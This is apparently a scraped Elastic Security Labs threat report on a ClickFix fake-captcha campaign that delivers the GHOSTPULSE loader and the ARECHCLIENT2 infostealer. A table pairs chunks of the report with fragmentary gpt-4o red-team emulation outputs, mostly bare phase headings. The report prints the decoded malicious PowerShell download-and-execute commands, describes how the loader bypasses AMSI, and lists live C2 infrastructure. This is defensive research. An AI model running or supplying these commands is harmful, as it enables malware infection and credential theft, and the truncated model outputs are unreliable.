| Original Text |
|---|
A Wretch Client: From ClickFix deception to information stealerdeployment — Elastic Security LabsSalim BitamPreambleElastic Security Labs has observed the ClickFix technique gaining popularity for multi-stage campaigns that deliver various malware throughsocial engineering tactics.Our threat intelligence indicates a substantial surge in activity leveraging ClickFix (technique first observed) as a primary initial access vector.This social engineering technique tricks users into copying and pasting malicious PowerShell that results in malware execution. Our telemetryhas tracked its use since last year, including instances leading to the deployment of new versions of the GHOSTPULSE loader. This led tocampaigns targeting a broad audience using malware and infostealers, such as LUMMA and ARECHCLIENT2, a family first observed in 2019but now experiencing a significant surge in popularity.This post examines a recent ClickFix campaign, providing an in-depth analysis of its components, the techniques employed, and the malwareit ultimately delivers.Key takeawaysClickFix: Remains a highly effective and prevalent initial access method.GHOSTPULSE: Continues to be widely used as a multi-stage payload loader, featuring ongoing development with new modules andimproved evasion techniques. Notably, its initial configuration is delivered within an encrypted file.ARECHCLIENT2 (SECTOPRAT): Has seen a considerable increase in malicious activity throughout 2025.The Initial Hook: Deconstructing ClickFix's Social EngineeringEvery successful multi-stage attack begins with a foothold, and in many recent campaigns, that initial step has been satisfied by ClickFix.ClickFix leverages human psychology, transforming seemingly innocuous user interactions into the very launchpad for compromise. Fake captchaAt its core, ClickFix is a social engineering technique designed to manipulate users into inadvertently executing malicious code on theirsystems. It preys on common online behaviors and psychological tendencies, presenting users with deceptive prompts – often disguised asbrowser updates, system errors, or even CAPTCHA verifications. The trick is simple yet incredibly effective: instead of a direct download, theuser is instructed to copy a seemingly harmless "fix" (which is a malicious PowerShell command) and paste it directly into their operatingsystem's run dialog. This seemingly voluntary action bypasses many traditional perimeter defenses, as the user initiates the process.ClickFix first emerged on the threat landscape in March 2024, but it has rapidly gained traction, exploding in prevalence throughout 2024and continuing its aggressive ascent into 2025. Its effectiveness lies in exploiting "verification fatigue" – the subconscious habit users developof mindlessly clicking through security checks. When confronted with a familiar-looking CAPTCHA or an urgent "fix it" button, many users,conditioned by routine, simply comply without scrutinizing the underlying request. This makes ClickFix an incredibly potent initial accessvector, favored by a broad spectrum of threat actors due to its high success rate in breaching initial defenses.Our recent Elastic Security research on EDDIESTEALER provides another concrete example of ClickFix's efficacy in facilitating malwaredeployment, further underscoring its versatility and widespread adoption in the threat landscape.Our internal telemetry at Elastic corroborates this trend, showing a significant volume in ClickFix-related alerts across our observedenvironments, particularly within Q1 2025. We've noted an increase in attempts compared to the previous quarter, with a predominant focuson the deployment of mass infection malware, such as RATs and InfoStealers.A ClickFix Campaign's Journey to ARECHCLIENT2The ClickFix technique often serves as the initial step in a larger, multi-stage attack. We've recently analyzed a campaign that clearly showsthis progression. This operation begins with a ClickFix lure, which tricks users into starting the infection process. After gaining initial access,the campaign deploys an updated version of the GHOSTPULSE Loader (also known as HIJACKLOADER, IDATLOADER). This loaderthen brings in an intermediate .NET loader. This additional stage is responsible for delivering the final payload: an ARECHCLIENT2(SECTOPRAT) sample, loaded directly into memory. This particular attack chain demonstrates how adversaries combine social engineeringwith hidden loader capabilities and multiple execution layers to steal data and gain remote control ultimately. Execution flowWe observed this exact campaign in our telemetry on , providing us with a direct look into its real-world execution and the sequence of itscomponents. Execution flow in KibanaTechnical analysis of the infectionThe infection chain begins with a phishing page that imitates a Cloudflare anti-DDoS Captcha verification.We observed two infrastructures (both resolving to 50.57.243[.]90) https://clients[.]dealeronlinemarketing[[.]]com/captcha/and https://clients[.]contology[.]com/captcha/ that deliver the same initial payload.User interaction on this page initiates execution. GHOSTPULSE serves as the malware loader in this campaign. Elastic Security Labs has beenclosely tracking this loader, and our previous research (2023 and2024) provided a detailed look into its initial capabilities. Fake captcha hosted by contology[.]comThe webpage is a heavily obfuscated JavaScript script that generates the HTML code and JavaScript, which copies a PowerShell command tothe clipboard. Obfuscated JavaScript of the captcha pageInspecting the runtime HTML code in a browser, we can see the front end of the page, but not the script that is run after clicking on thecheckbox Verify you are human.HTML code of the captcha pageA simple solution is to run it in a debugger to retrieve the information during execution. The second JS code is obfuscated, but we can easilyidentify two interesting functions. The first function, runClickedCheckboxEffects, retrieves the public IP address of the machine byquerying https://api.ipify[.]org?format=json, then it sends the IP address to the attacker’s infrastructure, https://koonenmagaziner[.]click/counter/<IP_address>, to log the infection.JavaScript of the captcha pageThe second function copies a base64-encoded PowerShell command to the clipboard. Command copied to the clipboard by the JavaScript scriptPowerShell command copied to the clipboardWhich is the following when it is base64 decoded(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT' -UseBasicParsing).content | iexWhen executed, it fetches the following PowerShell script:Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile "$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path "$env:TEMP/ComponentStyle.zip" -DestinationPath "$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"The observed infection process for this campaign involves GHOSTPULSE's deployment as follows: After the user executes the PowerShellcommand copied by ClickFix, the initial script fetches and runs additional commands. These PowerShell commands download a ZIP file(ComponentStyle.zip) from a remote location and then extract it into a temporary directory on the victim's system.Extracted contents include components for GHOSTPULSE, specifically a benign executable (Crysta_X64.exe) and a malicious dynamic-link library (DllXDownloadManager.dll). This setup utilizes DLL sideloading, a technique in which the legitimate executable loads themalicious DLL. The file (Heeschamjet.rc) is the IDAT file that contains the next stage's payloads in an encrypted formatand the file Shonomteak.bxi, which is encrypted and used by the loader to fetch the stage 2 and configuration structure. Content of ComponentStyle.zipGHOSTPULSEStage 1GHOSTPULSE is malware dating back to 2023. It has continuously received numerous updates, including a new way to store its encryptedpayload in an image by embedding the payload in the PNG’s pixels, as detailed in Elastic’s 2024 research blog post, and new modules fromZscaler research.The malware used in this campaign was shipped with an additional encrypted file named Shonomteak.bxi. During stage 1 of the loader, itdecrypts the file using a DWORD addition operation with a value stored in the file itself. Decryption of Shonomteak.bxi fileThe malware then extracts the stage 2 code from the decrypted file Shonomteak.bxi and injects it into a loaded library using theLibraryLoadA function. The library name is stored in the same decrypted file; in our case, it is vssapi.dll.The stage 2 function is then called with a structure parameter containing the filename of the IDAT PNG file, the stage 2 configuration thatwas inside the decrypted Shonomteak.bxi, and a boolean field b_detect_process set to True in our case. Structure used in stage 2Stage 2When the boolean field b_detect_process is set to True, the malware executes a function that checks for a list of processes to see if they arerunning. If a process is detected, execution is delayed by 5 seconds. Delays execution by 5 secondsIn previous samples, we analyzed GHOSTPULSE, which had its configuration hardcoded directly in the binary. This sample, on the otherhand, has all the necessary information required for the malware to function properly, stored in Shonomteak.bxi, including:Hashes for the DLL names and Windows APIsIDAT tag: used to find the start of the encrypted data in the PNG fileIDAT string: Which is simply “IDAT”Hashes of processes to scan for API fetching hashes stored in GHOSTPULSE configuration rather than hardcodedFinal thoughts on GHOSTPULSEGHOSTPULSE has seen multiple updates. The use of the IDAT header method to store the encrypted payload, rather than the new methodwe discovered in 2024, which utilizes pixels to store the payload, may indicate that the builder of this family maintained both options forcompiling new samples.Our configuration extractor performs payload extraction using both methods and can be used for mass analysis on samples. You can find theupdated tool in our labs-releases repository. Payload extraction from the GHOSTPULSE sampleARECHCLIENT2In 2025, a notable increase in activity involving ARECHCLIENT2 (SectopRAT) was observed. This heavily obfuscated .NET remote accesstool, initially identified in November 2019 and known for its information-stealing features, is now being deployed by GHOSTPULSE throughthe Clickfix social engineering technique. Our prior research documented the initial deployment of GHOSTPULSE utilizing ARECHCLIENT2around 2023.The payload deployed by GHOSTPULSE in a newly created process is an x86 native .NET loader, which in its turn loads ARECHCLIENT2.The loader goes through 3 steps:Patching AMSIExtracting and decrypting the payloadLoading the CLR, then reflectively loading ARECHCLIENT2 Main entry of the .NET loaderInterestingly, its error handling for debugging purposes is still present, in the form of message boxes using the MessageBoxA API, forexample, when failing to find the .tls section, an error message box with the string "D1" is displayed. Debugging/error messages through a message boxThe following is a table of all the error messages and their description:Message DescriptionF1LoadLibraryExW hooking failedF2 AMSI patching failedD1 Unable to find .tls sectionW2 Failed to load CLRThe malware sets up a hook on the LoadLibraryExW API. This hook waits for amsi.dll to be loaded, then sets another hook onAmsiScanBuffer 0, effectively bypassing AMSI. Hooking LoadLibraryExWAfter this, the loader fetches the pointer in memory to the .tls section by parsing the PE headers. The first 0x40 bytes of this section serve asthe XOR key, and the rest of the bytes contain the encrypted ARECHCLIENT2 sample, which the loader then decrypts. Payload decryption routineFinally, it loads the .NET Common Language Runtime (CLR) in memory with CLRCreateInstance Windows API before reflectively loadingARECHCLIENT2. The following is an example of how it is performed.ARECHCLIENT2 is a potent remote access trojan and infostealer, designed to target a broad spectrum of sensitive user data and systeminformation. The malware's core objectives primarily focus on:Credential and Financial Theft: ARECHCLIENT2 explicitly targets cryptocurrency wallets, browser-saved passwords, cookies, andautofill data. It also aims for credentials from FTP, VPN, Telegram, Discord, and Steam. DNSPY view of the StealerSettingConfigParce classSystem Profiling and Reconnaissance: ARECHCLIENT2 gathers extensive system details, including the operating system version,hardware information, IP address, machine name, and geolocation (city, country, and time zone). We've identified that both entities are linked to a digital advertising agency with a long operational history. Further investigation reveals thatthe company has consistently utilized client subdomains to host various content, including PDFs and forms, for advertising purposes.We assess that the attacker has likely compromised the server 50.57.243[.]90 and is leveraging it by exploiting the company's existinginfrastructure and advertising reach to facilitate widespread malicious activity.Further down the attack chain, analysis of the ARECHCLIENT2 C2 IPs (143.110.230[.]167 and 144.172.97[.]2) revealed additionalcampaign infrastructure. Both servers are hosted on different autonomous systems, AS14061 and AS14956.Pivoting on a shared banner hash (@ValidinLLC’s HOST-BANNER_0_HASH, which is the hash value of the web server response banners)revealed 120 unique servers across a range of autonomous systems over the last seven months. Of these 120, 19 have been previously labeledby various other vendors as “Sectop RAT” (aka ARECHCLIENT2) as documented in the maltrail repo. DNSPY view of ScanResult classCommand Execution: ARECHCLIENT2 receives and executes commands from its command-and-control (C2) server, granting attackersremote control over infected systems.The ARECHCLIENT2 malware connects to its C2 144.172.97[.]2, which is hardcoded in the binary as an encrypted string, and alsoretrieves its secondary C2 (143.110.230[.]167) IP from a hardcoded pastebin link https://pastebin[.]com/raw/Wg8DHh2x. ARECHCLIENT2 configuration from DNSPYInfrastructure analysisThe malicious captcha page was hosted under two domains clients.dealeronlinemarketing[.]com and clients.contology[.]comunder the URI /captcha and /Client pointing to the following IP address 50.57.243[.]90. ARECHCLIENT2 C2 Server Profile, courtesy @censysioThe service on port 9000 has Windows server headers, whereas the SSH and NGINX HTTP services both specify Ubuntu as the operatingsystem. This suggests a reverse proxy of the C2 to protect the actual C2team server by maintaining disposable front-end redirectors.ARECHCLIENT2 IOC:HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20This is an active campaign, and this infrastructure is being built and torn down at a high cadence over the last seven months. As ofpublication, the following C2 nodes are still active:Value First Seen Last Seen66.63.187.222025-06-15 2025-06-1545.94.47.1642025-06-02 2025-06-1584.200.17.1292025-06-04 2025-06-1582.117.255.2252025-03-14 2025-06-1545.77.154.1152025-06-05 2025-06-15144.172.94.1202025-05-20 2025-06-1579.124.62.102025-05-15 2025-06-1582.117.242.1782025-03-14 2025-06-15195.82.147.1322025-04-10 2025-06-1562.60.247.1542025-05-18 2025-06-1591.199.163.742025-04-03 2025-06-15172.86.72.812025-03-13 2025-06-15107.189.24.672025-06-02 2025-06-15143.110.230.1672025-06-08 2025-06-15185.156.72.802025-05-15 2025-06-1585.158.110.1792025-05-11 2025-06-15144.172.101.2282025-05-13 2025-06-15192.124.178.2442025-06-01 2025-06-15107.189.18.562025-04-27 2025-06-15194.87.29.622025-05-18 2025-06-15185.156.72.632025-06-12 2025-06-12193.149.176.312025-06-08 2025-06-12 ARECHCLIENT2 Host Banner Hash Pivot, courtesy @ValidinLLCPerforming focused validations of the latest occurrences (first occurrence after June 1, 2025) against VirusTotal shows community membershave previously labeled all 13 as Sectop RAT C2.All these servers have similar configurations:Running Canonical LinuxSSH on 22Unknown TCP on 443Nginx HTTP on 8080, andHTTP on 9000 (C2 port) Value First Seen Last Seen45.141.87.2492025-06-12 2025-06-12176.126.163.562025-05-06 2025-06-12185.156.72.712025-05-15 2025-06-1291.184.242.372025-05-15 2025-06-1245.141.86.1592025-05-15 2025-06-1267.220.72.1242025-06-05 2025-06-1245.118.248.292025-01-28 2025-06-12172.105.148.2332025-06-03 2025-06-10194.26.27.102025-05-06 2025-06-1045.141.87.2122025-06-08 2025-06-0845.141.86.1492025-05-15 2025-06-08172.235.190.1762025-06-08 2025-06-0845.141.86.822024-12-13 2025-06-0845.141.87.72025-05-13 2025-06-06185.125.50.1402025-04-06 2025-06-03ConclusionThis multi-stage cyber campaign effectively leverages ClickFix social engineering for initial access, deploying the GHOSTPULSE loader todeliver an intermediate .NET loader, ultimately culminating in the memory-resident ARECHCLIENT2 payload. This layered attack chaingathers extensive credentials, financial, and system data, while also granting attackers remote control capabilities over compromisedmachines.MITRE ATT&CKElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats useagainst enterprise networks.TacticsTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.Initial AccessExecutionDefense EvasionCommand and ControlCollectionTechniquesTechniques represent how an adversary achieves a tactical goal by performing an action.PhishingSpearphishing LinkUser ExecutionMalicious LinkMalicious FileCommand and Scripting InterpreterPowerShellDeobfuscation/DecodingDLL Sideloading Reflective LoadingUser InteractionIngress Tool TransferSystem Information DiscoveryProcess DiscoverySteal Web Session CookieDetecting [malware]DetectionElastic Defend detects this threat with the following behavior protection rules:Suspicious Command Shell Execution via Windows RunDNS Query to Suspicious Top Level DomainLibrary Load of a File Written by a Signed Binary ProxyConnection to WebService by a Signed Binary ProxyPotential Browser Information DiscoveryYARAWindows_Trojan_GhostPulseWindows_Trojan_Arechclient2ObservationsThe following observables were discussed in this research.Observable Type Name Referenceclients.dealeronlinemarketing[.]comdomain Captcha subdomainclients.contology[.]comdomain Captcha subdomainkoonenmagaziner[.]clickdomain50.57.243[.]90ipv4-addrclients.dealeronlinemarketing[.]com& clients.contology[.]com IPaddress144.172.97[.]2ipv4-addrARECHCLIENT2 C&C server143.110.230[.]167ipv4-addrARECHCLIENT2 C&C serverpastebin[.]com/raw/Wg8DHh2xipv4-addrContains ARECHCLIENT2 C&Cserver IP2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56aSHA-256DivXDownloadManager.dllGHOSTPULSEa8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90SHA-256Heeschamjiet.rcPNG GHOSTPULSEf92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55SHA-256 DOTNET LOADER4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9SHA-256 ARECHCLIENT2ReferencesThe following were referenced throughout the above research:https://x.com/SI_FalconTeam/status/1915790796948643929https://www.zscaler.com/blogs/security-research/analyzing-new-hijackloader-evasion-tactics |
| Original Text | ChatGPT 4o Paged |
|---|---|
A Wretch Client: From ClickFix deception to information stealerdeployment — Elastic Security LabsSalim BitamPreambleElastic Security Labs has observed the ClickFix technique gaining popularity for multi-stage campaigns that deliver various malware throughsocial engineering tactics.Our threat intelligence indicates a substantial surge in activity leveraging ClickFix (technique first observed) as a primary initial access vector.This social engineering technique tricks users into copying and pasting malicious PowerShell that results in malware execution. Our telemetryhas tracked its use since last year, including instances leading to the deployment of new versions of the GHOSTPULSE loader. This led tocampaigns targeting a broad audience using malware and infostealers, such as LUMMA and ARECHCLIENT2, a family first observed in 2019but now experiencing a significant surge in popularity.This post examines a recent ClickFix campaign, providing an in-depth analysis of its components, the techniques employed, and the malwareit ultimately delivers.Key takeawaysClickFix: Remains a highly effective and prevalent initial access method.GHOSTPULSE: Continues to be widely used as a multi-stage payload loader, featuring ongoing development with new modules andimproved evasion techniques. Notably, its initial configuration is delivered within an encrypted file.ARECHCLIENT2 (SECTOPRAT): Has seen a considerable increase in malicious activity throughout 2025.The Initial Hook: Deconstructing ClickFix's Social EngineeringEvery successful multi-stage attack begins with a foothold, and in many recent campaigns, that initial step has been satisfied by ClickFix.ClickFix leverages human psychology, transforming seemingly innocuous user interactions into the very launchpad for compromise. |
Model: gpt-4oPhase: Initial Access
Phase: Execution
Phase: Delivery
Phase: Malware Deployment
Phase: Evasion
|
Fake captchaAt its core, ClickFix is a social engineering technique designed to manipulate users into inadvertently executing malicious code on theirsystems. It preys on common online behaviors and psychological tendencies, presenting users with deceptive prompts – often disguised asbrowser updates, system errors, or even CAPTCHA verifications. The trick is simple yet incredibly effective: instead of a direct download, theuser is instructed to copy a seemingly harmless "fix" (which is a malicious PowerShell command) and paste it directly into their operatingsystem's run dialog. This seemingly voluntary action bypasses many traditional perimeter defenses, as the user initiates the process.ClickFix first emerged on the threat landscape in March 2024, but it has rapidly gained traction, exploding in prevalence throughout 2024and continuing its aggressive ascent into 2025. Its effectiveness lies in exploiting "verification fatigue" – the subconscious habit users developof mindlessly clicking through security checks. When confronted with a familiar-looking CAPTCHA or an urgent "fix it" button, many users,conditioned by routine, simply comply without scrutinizing the underlying request. This makes ClickFix an incredibly potent initial accessvector, favored by a broad spectrum of threat actors due to its high success rate in breaching initial defenses.Our recent Elastic Security research on EDDIESTEALER provides another concrete example of ClickFix's efficacy in facilitating malwaredeployment, further underscoring its versatility and widespread adoption in the threat landscape.Our internal telemetry at Elastic corroborates this trend, showing a significant volume in ClickFix-related alerts across our observedenvironments, particularly within Q1 2025. We've noted an increase in attempts compared to the previous quarter, with a predominant focuson the deployment of mass infection malware, such as RATs and InfoStealers.A ClickFix Campaign's Journey to ARECHCLIENT2The ClickFix technique often serves as the initial step in a larger, multi-stage attack. We've recently analyzed a campaign that clearly showsthis progression. This operation begins with a ClickFix lure, which tricks users into starting the infection process. After gaining initial access,the campaign deploys an updated version of the GHOSTPULSE Loader (also known as HIJACKLOADER, IDATLOADER). This loaderthen brings in an intermediate .NET loader. This additional stage is responsible for delivering the final payload: an ARECHCLIENT2(SECTOPRAT) sample, loaded directly into memory. This particular attack chain demonstrates how adversaries combine social engineeringwith hidden loader capabilities and multiple execution layers to steal data and gain remote control ultimately. |
Model: gpt-4oPhase: Initial Access
Phase: Execution
Phase: Delivery of Payload
Phase: Payload Deployment
Phase: Impact
This attack chain demonstrates the use of social engineering combined with multi-stage execution to effectively bypass defenses and execute malware. |
Execution flowWe observed this exact campaign in our telemetry on , providing us with a direct look into its real-world execution and the sequence of itscomponents. Execution flow in KibanaTechnical analysis of the infectionThe infection chain begins with a phishing page that imitates a Cloudflare anti-DDoS Captcha verification.We observed two infrastructures (both resolving to 50.57.243[.]90) https://clients[.]dealeronlinemarketing[[.]]com/captcha/and https://clients[.]contology[.]com/captcha/ that deliver the same initial payload.User interaction on this page initiates execution. GHOSTPULSE serves as the malware loader in this campaign. Elastic Security Labs has beenclosely tracking this loader, and our previous research (2023 and2024) provided a detailed look into its initial capabilities. Fake captcha hosted by contology[.]comThe webpage is a heavily obfuscated JavaScript script that generates the HTML code and JavaScript, which copies a PowerShell command tothe clipboard. |
Model: gpt-4oPhase: Initial Access
Phase: Execution
Likely Command (inferred):
Malware Loader
(Note: The report did not provide explicit details beyond the points mentioned, limiting inference without further data on specific command usage.) |
Obfuscated JavaScript of the captcha pageInspecting the runtime HTML code in a browser, we can see the front end of the page, but not the script that is run after clicking on thecheckbox Verify you are human.HTML code of the captcha pageA simple solution is to run it in a debugger to retrieve the information during execution. The second JS code is obfuscated, but we can easilyidentify two interesting functions. The first function, runClickedCheckboxEffects, retrieves the public IP address of the machine byquerying https://api.ipify[.]org?format=json, then it sends the IP address to the attacker’s infrastructure, https://koonenmagaziner[.]click/counter/<IP_address>, to log the infection.JavaScript of the captcha pageThe second function copies a base64-encoded PowerShell command to the clipboard. |
Model: gpt-4oPhase: Execution
Phase: Execution
Inferred Command (likely based on behavior described)
|
Command copied to the clipboard by the JavaScript scriptPowerShell command copied to the clipboardWhich is the following when it is base64 decoded(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT' -UseBasicParsing).content | iexWhen executed, it fetches the following PowerShell script:Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile "$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path "$env:TEMP/ComponentStyle.zip" -DestinationPath "$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"The observed infection process for this campaign involves GHOSTPULSE's deployment as follows: After the user executes the PowerShellcommand copied by ClickFix, the initial script fetches and runs additional commands. These PowerShell commands download a ZIP file(ComponentStyle.zip) from a remote location and then extract it into a temporary directory on the victim's system.Extracted contents include components for GHOSTPULSE, specifically a benign executable (Crysta_X64.exe) and a malicious dynamic-link library (DllXDownloadManager.dll). This setup utilizes DLL sideloading, a technique in which the legitimate executable loads themalicious DLL. The file (Heeschamjet.rc) is the IDAT file that contains the next stage's payloads in an encrypted formatand the file Shonomteak.bxi, which is encrypted and used by the loader to fetch the stage 2 and configuration structure. Content of ComponentStyle.zipGHOSTPULSEStage 1GHOSTPULSE is malware dating back to 2023. It has continuously received numerous updates, including a new way to store its encryptedpayload in an image by embedding the payload in the PNG’s pixels, as detailed in Elastic’s 2024 research blog post, and new modules fromZscaler research.The malware used in this campaign was shipped with an additional encrypted file named Shonomteak.bxi. During stage 1 of the loader, itdecrypts the file using a DWORD addition operation with a value stored in the file itself. |
Model: gpt-4oPhase: Execution
Phase: Execution
Phase: Persistence (Via DLL Sideloading)
Phase: Execution (Stage 1)
|
Decryption of Shonomteak.bxi fileThe malware then extracts the stage 2 code from the decrypted file Shonomteak.bxi and injects it into a loaded library using theLibraryLoadA function. The library name is stored in the same decrypted file; in our case, it is vssapi.dll.The stage 2 function is then called with a structure parameter containing the filename of the IDAT PNG file, the stage 2 configuration thatwas inside the decrypted Shonomteak.bxi, and a boolean field b_detect_process set to True in our case. Structure used in stage 2Stage 2When the boolean field b_detect_process is set to True, the malware executes a function that checks for a list of processes to see if they arerunning. If a process is detected, execution is delayed by 5 seconds. Delays execution by 5 secondsIn previous samples, we analyzed GHOSTPULSE, which had its configuration hardcoded directly in the binary. This sample, on the otherhand, has all the necessary information required for the malware to function properly, stored in Shonomteak.bxi, including:Hashes for the DLL names and Windows APIsIDAT tag: used to find the start of the encrypted data in the PNG fileIDAT string: Which is simply “IDAT”Hashes of processes to scan for API fetching hashes stored in GHOSTPULSE configuration rather than hardcodedFinal thoughts on GHOSTPULSEGHOSTPULSE has seen multiple updates. The use of the IDAT header method to store the encrypted payload, rather than the new methodwe discovered in 2024, which utilizes pixels to store the payload, may indicate that the builder of this family maintained both options forcompiling new samples.Our configuration extractor performs payload extraction using both methods and can be used for mass analysis on samples. You can find theupdated tool in our labs-releases repository. |
Model: gpt-4oPhase: Initial Access
Phase: Execution
Phase: Configuration Injection
Phase: Defense Evasion
Phase: Reconnaissance
Phase: Payload Storage
|
Payload extraction from the GHOSTPULSE sampleARECHCLIENT2In 2025, a notable increase in activity involving ARECHCLIENT2 (SectopRAT) was observed. This heavily obfuscated .NET remote accesstool, initially identified in November 2019 and known for its information-stealing features, is now being deployed by GHOSTPULSE throughthe Clickfix social engineering technique. Our prior research documented the initial deployment of GHOSTPULSE utilizing ARECHCLIENT2around 2023.The payload deployed by GHOSTPULSE in a newly created process is an x86 native .NET loader, which in its turn loads ARECHCLIENT2.The loader goes through 3 steps:Patching AMSIExtracting and decrypting the payloadLoading the CLR, then reflectively loading ARECHCLIENT2 Main entry of the .NET loaderInterestingly, its error handling for debugging purposes is still present, in the form of message boxes using the MessageBoxA API, forexample, when failing to find the .tls section, an error message box with the string "D1" is displayed. Debugging/error messages through a message boxThe following is a table of all the error messages and their description:Message DescriptionF1LoadLibraryExW hooking failedF2 AMSI patching failedD1 Unable to find .tls sectionW2 Failed to load CLRThe malware sets up a hook on the LoadLibraryExW API. This hook waits for amsi.dll to be loaded, then sets another hook onAmsiScanBuffer 0, effectively bypassing AMSI. |
Model: gpt-4oPhase: Initial Access
Phase: Execution
Phase: Defense Evasion
Phase: Error Handling and Debugging
|
Hooking LoadLibraryExWAfter this, the loader fetches the pointer in memory to the .tls section by parsing the PE headers. The first 0x40 bytes of this section serve asthe XOR key, and the rest of the bytes contain the encrypted ARECHCLIENT2 sample, which the loader then decrypts. Payload decryption routineFinally, it loads the .NET Common Language Runtime (CLR) in memory with CLRCreateInstance Windows API before reflectively loadingARECHCLIENT2. The following is an example of how it is performed.ARECHCLIENT2 is a potent remote access trojan and infostealer, designed to target a broad spectrum of sensitive user data and systeminformation. The malware's core objectives primarily focus on:Credential and Financial Theft: ARECHCLIENT2 explicitly targets cryptocurrency wallets, browser-saved passwords, cookies, andautofill data. It also aims for credentials from FTP, VPN, Telegram, Discord, and Steam. DNSPY view of the StealerSettingConfigParce classSystem Profiling and Reconnaissance: ARECHCLIENT2 gathers extensive system details, including the operating system version,hardware information, IP address, machine name, and geolocation (city, country, and time zone). |
Model: gpt-4oPhase: Execution
Phase: Credential Access
Phase: Discovery
Note: Specific command-line syntax was not provided in the report; inferred procedures are based on described behavior and common attack methodology. |
We've identified that both entities are linked to a digital advertising agency with a long operational history. Further investigation reveals thatthe company has consistently utilized client subdomains to host various content, including PDFs and forms, for advertising purposes.We assess that the attacker has likely compromised the server 50.57.243[.]90 and is leveraging it by exploiting the company's existinginfrastructure and advertising reach to facilitate widespread malicious activity.Further down the attack chain, analysis of the ARECHCLIENT2 C2 IPs (143.110.230[.]167 and 144.172.97[.]2) revealed additionalcampaign infrastructure. Both servers are hosted on different autonomous systems, AS14061 and AS14956.Pivoting on a shared banner hash (@ValidinLLC’s HOST-BANNER_0_HASH, which is the hash value of the web server response banners)revealed 120 unique servers across a range of autonomous systems over the last seven months. Of these 120, 19 have been previously labeledby various other vendors as “Sectop RAT” (aka ARECHCLIENT2) as documented in the maltrail repo. |
Model: gpt-4oBased on the provided information, the report lacks specific command lines or explicit procedures. However, we can infer some likely techniques used by the threat actor. Here’s how the attack might have been conducted, structured in phases: Phase: Initial Access
Phase: Command and Control
Phase: Attack Infrastructure Setup
Additional Considerations:
To create specific emulation commands for a red team, more detailed information on the attacker’s TTPs would be needed. This could include examining specific vulnerabilities exploited, RAT functionalities, and precise methods of server communication. |
DNSPY view of ScanResult classCommand Execution: ARECHCLIENT2 receives and executes commands from its command-and-control (C2) server, granting attackersremote control over infected systems.The ARECHCLIENT2 malware connects to its C2 144.172.97[.]2, which is hardcoded in the binary as an encrypted string, and alsoretrieves its secondary C2 (143.110.230[.]167) IP from a hardcoded pastebin link https://pastebin[.]com/raw/Wg8DHh2x. ARECHCLIENT2 configuration from DNSPYInfrastructure analysisThe malicious captcha page was hosted under two domains clients.dealeronlinemarketing[.]com and clients.contology[.]comunder the URI /captcha and /Client pointing to the following IP address 50.57.243[.]90. |
Model: gpt-4oPhase: Command and Control
Phase: Infrastructure Analysis
Note: The details on exact command-line executions are not provided, but understanding the malware's capability to execute commands remotely on receiving instructions from C2 is crucial for emulation. |
ARECHCLIENT2 C2 Server Profile, courtesy @censysioThe service on port 9000 has Windows server headers, whereas the SSH and NGINX HTTP services both specify Ubuntu as the operatingsystem. This suggests a reverse proxy of the C2 to protect the actual C2team server by maintaining disposable front-end redirectors.ARECHCLIENT2 IOC:HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20This is an active campaign, and this infrastructure is being built and torn down at a high cadence over the last seven months. As ofpublication, the following C2 nodes are still active:Value First Seen Last Seen66.63.187.222025-06-15 2025-06-1545.94.47.1642025-06-02 2025-06-1584.200.17.1292025-06-04 2025-06-1582.117.255.2252025-03-14 2025-06-1545.77.154.1152025-06-05 2025-06-15144.172.94.1202025-05-20 2025-06-1579.124.62.102025-05-15 2025-06-1582.117.242.1782025-03-14 2025-06-15195.82.147.1322025-04-10 2025-06-1562.60.247.1542025-05-18 2025-06-1591.199.163.742025-04-03 2025-06-15172.86.72.812025-03-13 2025-06-15107.189.24.672025-06-02 2025-06-15143.110.230.1672025-06-08 2025-06-15185.156.72.802025-05-15 2025-06-1585.158.110.1792025-05-11 2025-06-15144.172.101.2282025-05-13 2025-06-15192.124.178.2442025-06-01 2025-06-15107.189.18.562025-04-27 2025-06-15194.87.29.622025-05-18 2025-06-15185.156.72.632025-06-12 2025-06-12193.149.176.312025-06-08 2025-06-12 |
Model: gpt-4oThe provided report focuses on the infrastructure setup of a C2 server, specifically highlighting a reverse proxy configuration. Unfortunately, the text lacks explicit command lines or procedures related to how attackers might operationalize this infrastructure. However, I can infer some possible tactics based on common practices: Phase: Infrastructure Setup
Phase: Operational Resilience
For a red team to emulate such behavior, they could utilize:
- Command for Reverse Proxy (NGINX Example):
Any more detailed TTPs would require additional context or example commands from the report. |
ARECHCLIENT2 Host Banner Hash Pivot, courtesy @ValidinLLCPerforming focused validations of the latest occurrences (first occurrence after June 1, 2025) against VirusTotal shows community membershave previously labeled all 13 as Sectop RAT C2.All these servers have similar configurations:Running Canonical LinuxSSH on 22Unknown TCP on 443Nginx HTTP on 8080, andHTTP on 9000 (C2 port) |
Model: gpt-4oPhase: Initial Access
Phase: Execution
Phase: Persistence
Phase: Command and Control
Phase: Defense Evasion
Note: Specific command lines or scripts were not detailed in the report, so likely procedures were inferred based on typical attack patterns and reported behaviors. |
